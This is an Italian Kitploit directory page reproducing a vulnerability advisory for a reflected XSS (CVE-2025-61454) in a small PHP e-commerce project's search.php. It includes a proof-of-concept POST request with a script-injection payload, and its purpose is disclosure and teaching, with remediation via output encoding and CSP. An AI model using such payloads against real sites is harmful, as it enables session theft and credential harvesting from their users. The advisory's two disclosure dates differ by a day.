Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-61454 — Divulgazione pubblica e proof-of-concept per CVE-2025-61454, una vulnerabilità XSS riflessa in search.php di E-commerce Project v1.0, inclusi passaggi di sfruttamento e indicazioni di rimedio. | Kitploit
Strumenti/GitHubGitHub/tansique-17/cve-2025-61454
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPaper e RicercaApprendimento e Formazione
GitHubtansique-17/cve-2025-61454

CVE-2025-61454

Divulgazione pubblica e proof-of-concept per CVE-2025-61454, una vulnerabilità XSS riflessa in search.php di E-commerce Project v1.0, inclusi passaggi di sfruttamento e indicazioni di rimedio.

Vedi Repository
10 mesi faNon ancora revisionato
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ Divulgazione CVE: CVE-2025-61454 — XSS Riflesso in Progetto E-commerce

Data di divulgazione: 14 ottobre 2025
ID CVE: CVE-2025-61454
Gravità: MEDIA (CVSS 6.1)


🧩 Riepilogo

Esiste una vulnerabilità di Cross-Site Scripting (XSS) riflesso nel Progetto E-commerce v1.0, in particolare nell'endpoint search.php. L'input non sanificato nel parametro search viene riflesso direttamente nell'HTML della risposta, consentendo agli aggressori di eseguire JavaScript arbitrario nel browser di un utente che visita un link dannoso o invia una richiesta appositamente costruita.

A questo problema è stato assegnato l'identificatore CVE-2025-61454. Al momento della divulgazione, nessuna patch è stata rilasciata dal fornitore.


📦 Prodotto Interessato

  • Fornitore: Indipendente (Bhabishya-123)
  • Progetto: E-commerce
  • Versione: v1.0
  • File: search.php
  • Endpoint Vulnerabile:
    http://localhost/e-commerce-main/search.php

  • 🔬 Dettagli della Vulnerabilità

    Il server non sanifica correttamente il parametro search dai dati POST prima di rifletterlo nell'HTML della risposta. Ciò consente agli aggressori di iniettare payload JavaScript, portando all'esecuzione di codice lato client.

    Un aggressore costruisce un input contenente contenuto simile a script incorporato e lo invia all'endpoint POST vulnerabile. Poiché il server riflette l'input nella risposta HTML senza applicare una corretta codifica HTML/attributo/JS, il browser tratta il contenuto riflesso come markup eseguibile e lo esegue. Questo è uno scenario XSS riflesso (non persistente); l'aggressore deve convincere la vittima a effettuare la richiesta o a visitare un link/modulo appositamente costruito.

    Pattern di Codice Vulnerabile (ipotetico):

    root@kitploit:~
    $search = $_POST['search'];
    echo "<div>Search results for: $search</div>";
    

    📌 Classificazione CWE

    ID CWETitolo
    CWE-79Neutralizzazione impropria dell'input durante la generazione di pagine web ('Cross-site Scripting')

    📊 Punteggio CVSS v3.1

    PunteggioGravitàStringa del Vettore
    6.1MEDIACVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

    💥 Impatto

    Uno sfruttamento riuscito potrebbe comportare:

    • 🧠 Esecuzione di JavaScript arbitrario
    • 🎭 Phishing o impersonificazione tramite iniezione HTML
    • 🍪 Dirottamento di sessione o furto di token
    • 🚨 Reindirizzamento forzato o distribuzione di malware
    • 🎣 Raccolta di credenziali tramite moduli di accesso falsi
    • 📊 Deturpazione della pagina dei risultati di ricerca

    🧪 Prova di Concetto (PoC)

    1. Clonare il Repository

    root@kitploit:~
    git clone https://github.com/Bhabishya-123/E-commerce.git
    

    2. Hosting Locale

    Utilizzare XAMPP/LAMP per distribuire il progetto e accedere all'applicazione.

    3. Sfruttare la Vulnerabilità

    📥 Richiesta di Esempio

    root@kitploit:~
    POST /e-commerce-main/search.php HTTP/1.1
    Host: localhost
    Referer: https://localhost/e-commerce-main/
    Content-Type: application/x-www-form-urlencoded
    
    search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=
    

    📋 Payload Decodificato

    root@kitploit:~
    search=yxo9p<script>alert(1)</script>xnzmd&submit=
    

    📋 Payload Iniettato

    root@kitploit:~
    yxo9p<script>alert(1)</script>xnzmd
    

    Spiegazione:
    Il payload <script>alert(1)</script> è incorporato nel parametro search. Quando una vittima invia un modulo di ricerca con questo payload dannoso (o viene indotta a farlo tramite ingegneria sociale), il JavaScript viene eseguito nel contesto del suo browser.

    4. Risultato Atteso

    Se vulnerabile, il browser eseguirà il codice JavaScript, mostrando una finestra di avviso con il valore 1. Ciò conferma lo sfruttamento XSS riuscito.


    🔐 Raccomandazioni

    • ✅ Utilizzare htmlspecialchars() o equivalente per codificare tutti gli output non attendibili prima di renderizzarli in HTML.
    • 🧰 Implementare la validazione dell'input lato server per tutti gli input dei moduli, in particolare il parametro search.
    • 🧱 Impostare intestazioni Content Security Policy (CSP) forti per prevenire l'esecuzione di script inline.
    • 🚫 Evitare di incorporare direttamente input utente non sanificati nelle risposte HTML.
    • 🔒 Implementare una corretta codifica dell'output in base al contesto (HTML, JavaScript, URL, CSS).
    • 🛡️ Utilizzare framework moderni che forniscono protezione automatica contro XSS.

    ✅ Esempio di Correzione

    root@kitploit:~
    $search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
    echo "<div>Search results for: $search</div>";
    

    🛡️ Esempio di Content Security Policy

    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    

    📆 Cronologia

    EventoData
    Vulnerabilità Scoperta16 settembre 2025
    Divulgazione Pubblica13 ottobre 2025
    Patch Disponibile❌ Non disponibile al momento della divulgazione

    🙋‍♂️ Crediti

    Questa vulnerabilità è stata scoperta e divulgata da:

    Tansique Dasari
    🔗 GitHub
    ✉️ [email protected]


    🔗 Riferimenti

    • OWASP - XSS
    • CWE-79 - Classificazione XSS
    • PortSwigger - Cross-site Scripting
    • CVE-2025-61454 su CVE.org

    💬 Questa advisory è pubblicata in modo indipendente a causa dell'assenza di una patch ufficiale del fornitore.

    Scarica lo strumento